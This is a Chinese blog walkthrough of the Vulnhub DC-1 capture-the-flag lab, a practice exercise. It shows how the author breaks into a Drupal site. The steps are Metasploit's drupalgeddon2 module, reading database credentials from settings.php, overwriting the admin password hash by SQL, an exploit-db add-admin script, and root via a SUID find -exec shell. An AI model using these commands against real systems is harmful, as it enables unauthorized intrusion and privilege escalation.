Vulnhub靶场渗透测试系列DC-1(Drupal漏洞)

最新推荐文章于 2024-05-02 21:31:31 发布
最新推荐文章于 2024-05-02 21:31:31 发布
阅读量4.8k 收藏 31
点赞数 7
分类专栏: 渗透测试 Vulnhub-CTF 文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45722813/article/details/121317680
版权

Vulnhub渗透测试系列DC-1(Drupal漏洞)

靶机下载

地址:https://www.vulnhub.com/entry/dc-1,292/
攻击机使用kali2021的VMware虚拟机,IP地址:192.168.172.131

在VMware中导入靶机,中间可能出现这个问题,直接点击【重试】
在这里插入图片描述
导入之后将网络模式设置为NAT模式
在这里插入图片描述
开启靶机虚拟机过程出现下面这个,点击【是】或【否】都可
在这里插入图片描述

虚拟机已开启
在这里插入图片描述
在kali攻击机中使用命令nmap -Pn 192.168.172.1/24扫描,进行主机发现,获取靶机的IP地址,这里看你需要你自己判断一下哪个是你的靶机
在这里插入图片描述
然后使用命令nmap -A -p- 192.168.172.136扫描靶机的操作系统,开放端口以及对应的服务有哪些
在这里插入图片描述在这里插入图片描述
可以看到靶机开放了22端口-ssh服务,80端口-http服务,服务器版本为Apache httpd 2.2.22,111端口-rpcbind服务,还有一个46161端口
操作系统为Linux3.X

因为有http服务,打开浏览器在地址栏输入靶机IP地址打开网页,得到一个登录页面
在这里插入图片描述
从这里初步判断这是一个基于Drupal框架的网页,鼠标右键点击【检查元素】看看
在这里插入图片描述
点击【网络】,查看第一个
在这里插入图片描述
确实是基于Drupal框架的网页,现在我们打开MSF看看有没有关于Drupal的exp
在这里插入图片描述
现在输入use exploit/unix/webapp/drupal_drupalgeddon2选择此攻击模块,然后输入命令show options显示需要配置的项
在这里插入图片描述
只需设置RHOSTS,将其设置为靶机IP地址,其他的默认即可,然后输入exploit进行攻击
在这里插入图片描述
已经拿到meterpreter
在这里插入图片描述
输入ls查看目录及文件,发现flag1.txt文件
在这里插入图片描述
输入cat flag1.txt将文件打开
在这里插入图片描述

得到提示,查看配置文件,进入sites目录,ls查看,然后一个一个找嘛,将文件都打开,最后在default中发现一个settings.php文件
在这里插入图片描述
使用命令cat setting.txt将文件打开,发现了flag2,同时得到了一个mysql用户和密码
在这里插入图片描述
使用命令shell拿到shell,然后再使用命令python -c import pty; pty.spawn('/bin/bash')"获取一个交互式shell
在这里插入图片描述
然后使用命令mysql -udbuser -pR0ck3t登录MySQL数据库
在这里插入图片描述
使用show databases;命令显示数据库,看到有两个数据库
在这里插入图片描述
然后进入drupaldb数据库查看数据表信息
在这里插入图片描述
发现users数据表可能对我们有用
在这里插入图片描述
从users表中查询用户数据信息
在这里插入图片描述
密码都是加密的,直接破解的话成本有点高,所以这里有两种办法,一种是修改用户密码,一种是新添加一个用户,我们首先来看看修改用户密码

通过分析,判断用户密码密文的产生脚本是靶机中的/scriptss/password-hash.sh
在这里插入图片描述
然后我们使用这个脚本来产生admin的密文,这样用户admin的密码就是admin了
在这里插入图片描述
使用命令update drupaldb.users set pass="$S$DyhIBGdqRLFMMZRmUha9nUrfMQzQFU.JMxSvl79bqpFoxCNP80tv" where name="admin";更改用户admin的密码
在这里插入图片描述
然后使用admin和admin在网页登录,登录成功
在这里插入图片描述
点击左上角的content可以发现一个flag3,flag3得到内容
在这里插入图片描述
提示我们需要find查找,然后试试命令find / -name "*flag*"查找flag文件,发现flag4.txt和thefinalflag.txt
在这里插入图片描述
进入到/home/flag4目录下,使用命令cat flag4.txt查看文件
在这里插入图片描述
提示我们提权到root,所以我们按照权限查找文件,如果错误则重定向到“黑洞”,
-perm: 按照权限查找
-type: 查块设备d、目录d、字符设备c、管道c、管道p、符号链接l、普通文件f
-u=s: 拥有者是s权限
S权限:设置使文件在执行阶段具有文件所有者的权限,相当于临时拥有文件所有者的身份,典型的文件是passwd。如果一般用户执行该文件,则在执行过程中,该文件可以获得root权限,从而可以更改用户的密码
使用命令find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
这个文件是有root权限的,且在这个权限下可读可写可执行
在这里插入图片描述
提权,
-exec:对匹配的文件执行该参数所给出的shell命令,形式为command {} ;
在这里插入图片描述
查看thefinalflag.txt文件
在这里插入图片描述
还有第二种方法:
去exploitdb中看看有没有可以攻击admin的脚本,命令searchsploit drupal在msf中搜索,发现有一个针对Drupal 7版本的攻击脚本,可以增加一个具有admin权限的用户
在这里插入图片描述使用命令python /usr/share/exploitdb/exploits/php/webapps/34992.py -t 192.168.172.136 -u admin1 -p admin1添加新用户admin1,密码也为admin1
在这里插入图片描述
然后再网页出使用新用户admin1登录网站
在这里插入图片描述
获取到flag3
在这里插入图片描述
根据flag3的提示,我们知道需要进行提权,首先查看系统上运行的所有的SUID可执行文件,或者是具有root权限的SUID文件,使用命令find / -user root -perm -4000 -print 2>/dev/null进行查找
在这里插入图片描述
就找find命令进行利用,先查看其信息,发现确实是具有root用户权限的SUID文件,然后使用命令find ./ aaa -exec '/bin/sh' \;获取root权限,并查看
在这里插入图片描述
这个地方不知道为什么提权后看不了flag4.txt文件,我上一次做的时候是可以的,所以有点奇怪,先不管了,反正上面一种方法做出来了

参考文章:
https://blog.csdn.net/weixin_43980115/article/details/115051573
http://cn-sec.com/archives/202462.html

某某IT打工仔
关注
  • 7
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
vulhubdrupal 代码执行漏洞复现 (CVE-2018-7600)
sszsNo1的博客
07-02 340
vulhubdrupal 代码执行漏洞 (CVE-2018-7600)如何复现
渗透测试part(三):Vulhub配置及打靶(以Drupal CVE-2018-7600为例)
m0_56592545的博客
06-25 1124
系列总共分成了三个部分,在第一部分中对渗透测试进行了简要的概述,第二部分通过VMware搭建了Vulnhub的一个靶机,第三部分则在Ubuntu操作系统中基于Vulhub搭建了一个靶机并借助kali的Metasploit工具快速完成了对Drupal的渗透。t=N5K3t=N5K3t=N5K3t=N5K3t=N5K3打靶-vulhub靶场-drupal-CVE-2018-7600_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1Tv4y1C7GC/?
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
小司机的奥拓
04-23 1667
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅我也会不定期再中间更新复现文章链接目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者。
DC1靶场 Drupal
m0_62438849的博客
03-02 1137
22端口是开放的,试试ssh登录呢, ssh 客户端用户名@服务器ip地址,我本来想以刚才的admin和1111111试试能否登录,不能登录。find / -perm -4000 2>/dev/null寻找 4000权限的文件,不显示其他的错误信息相当于过滤。点击Dashboard,看到flag3,特殊的访问权限将能帮助找到密码,需要执行命令行,在/etc/shadow。内容格式:x表示此用户设有密码,但不是真正的密码,真正的密码保存在 /etc/shadow 文件中。
Vulhub靶场之Tomcat漏洞复现
weixin_66717977的博客
06-30 434
tomcat漏洞复现
Vulnhub靶场渗透测试系列DC-3(Joomla CMS漏洞和Ubuntu16.04漏洞)
qq_45722813的博客
12-07 3003
Vulnhub靶场渗透测试DC-3 靶机下载地址:https://www.five86.com/dc-3.html 攻击机为kali2021,IP地址:192.168.172.131 将靶机导入到VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用nmap进行存活主机发现来获取靶机IP地址,命令nmap -T4 -Pn 192.168.172.1/24 但是发现没有扫描到靶机IP,可能是靶机网络设置问题,参考文章:https://editor.csdn.net/md/?artic
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6002
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
66.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。第1页 共25页
vulnhub靶场库中 DC:1
07-06
DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和掌握基础的渗透测试技巧和漏洞利用。 2. **实验环境配置** 在进行渗透测试之前,需要搭建实验环境。这里使用了Vmware Workstation 16作为虚拟机软件,...
ansible-role-drupal:Ansible角色-Drupal
02-01
**Ansible角色-Ansible-role-drupal:自动化Drupal部署与管理** Drupal,作为一个流行的开源内容管理系统(CMS),在Web开发领域被广泛使用。而Ansible则是一款强大的IT自动化工具,可帮助管理员进行配置管理、应用...
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习】 渗透测试靶机是安全研究人员和网络...同时,也展示了如何通过源代码分析和利用软件漏洞进行渗透测试。在实际操作中,安全专家必须严格遵守法律和道德规范,仅在合法授权的环境中进行此类活动。
Vulhub靶场】Nginx 中间件漏洞复现
最新发布
M372109150的博客
05-02 1300
本文主要对nginx的漏洞进行复现,在vulhub靶场复现nginx文件名逻辑漏洞、Nginx越界读取缓存漏洞(CVE-2017-7529)、Nginx 配置错误导致漏洞以及解析漏洞
【废了-准备删除01】渗透测试靶机搭建——基于WAMP的drupal7.x管理系统
Fighting_hawk的博客
03-22 4475
1. 本节主要是为后续进行渗透测试实验准备好靶机平台。
Vulhub靶场之struts2漏洞复现
weixin_66717977的博客
03-21 1327
struts2漏洞中属s2系列杀伤力最大,本文基于vulhub靶场,将介绍并复现strut2漏洞
drupal 入门
云客的技术博客【云游天下 做客四方】
09-12 8788
2016年9月11日drupal深圳社区组织了一次聚会,做了个D8入门分享,这里整理了一下,D8正式版是2015年11月19日发布,我也是从这个时候开始学习研究drupal ,过去差不多一年时间了,入门过程的很多东西记忆犹新,可能将来这些感受会慢慢的忘记,所以在这一次聚会征集的时候我把它记录分享出来,一来可以帮助处于drupal大门之外正在观望的朋友以及决定深入研究正在入门的朋友,二来自己也做一个
【靶机渗透】——VulnHub-DC-1靶机渗透测试
Kris__zhang的博客
06-11 860
靶机下载 靶机下载地址: https://www.vulnhub.com/entry/dc-1,292/ 探测目标 使用kali自带的netdiscover命令探测存活主机。 发现192.168.56.109就是目标机 端口扫描 使用nmap扫描 发现开启了22 ssh和 80端口 我们呢先看下80端口 这是个drupal的cms 目录扫描 使用dirb扫描 用法 dirb 目标 字典路径 查看robots.txt 访问/CHANGELOG.txt 出错,访问/UPGRADE.txt来确认升级情况也
DC-1靶机渗透
plant1234的博客
04-17 1171
简介 靶机名称:DC1 下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 一、信息收集 利用nmap扫描发现主机: nmap -sP 192.168.229.0/24 获取主机为:192.168.229.180 收集主机端口和其它信息: nmap -sS -sV -T5 -A -p- 192.168.229.180 发现开发22端口和80端口,并且运行在Linux上 二、漏洞查找 发现有80端口直接访问得到: 发现是cms是drupal,用msf看一
Vulhub之“Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
angry_program的博客
03-04 3542
简介 Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。 漏洞环境 进入对应的路径: vulhub-master/drupal/CVE-2014-3704 执行如下命令启动Drupal 7.31环境: docker-compose up -d 环境...
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列渗透测试漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动靶场环境。 2. 信息收集:通过探测靶机真实IP和开放的端口及服务进行信息收集。 3. 访问web站点:访问web站点并进行网站的扫描和漏洞探测。 4. 利用漏洞:使用Metasploit框架(MSF)进行漏洞利用。 - 使用MSF命令进行简单命令介绍和搜索Drupal 7的漏洞。 - 在MSF控制台中搜索drupal模块,并选择合适的模块进行测试。 - 设置靶机IP并运行相应的漏洞利用模块。 - 获取反弹shell或执行命令,并查找flag文件。 5. 登录站点:使用获取到的凭证登录站点并进一步探索和查找flag文件。 请注意,以上步骤仅提供了通关vulnhub靶场的大致思路,具体操作和漏洞利用可能因不同的靶场环境而有所不同。因此,确保在进行任何渗透测试操作之前,遵守法律和道德准则,并获得合法的授权。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值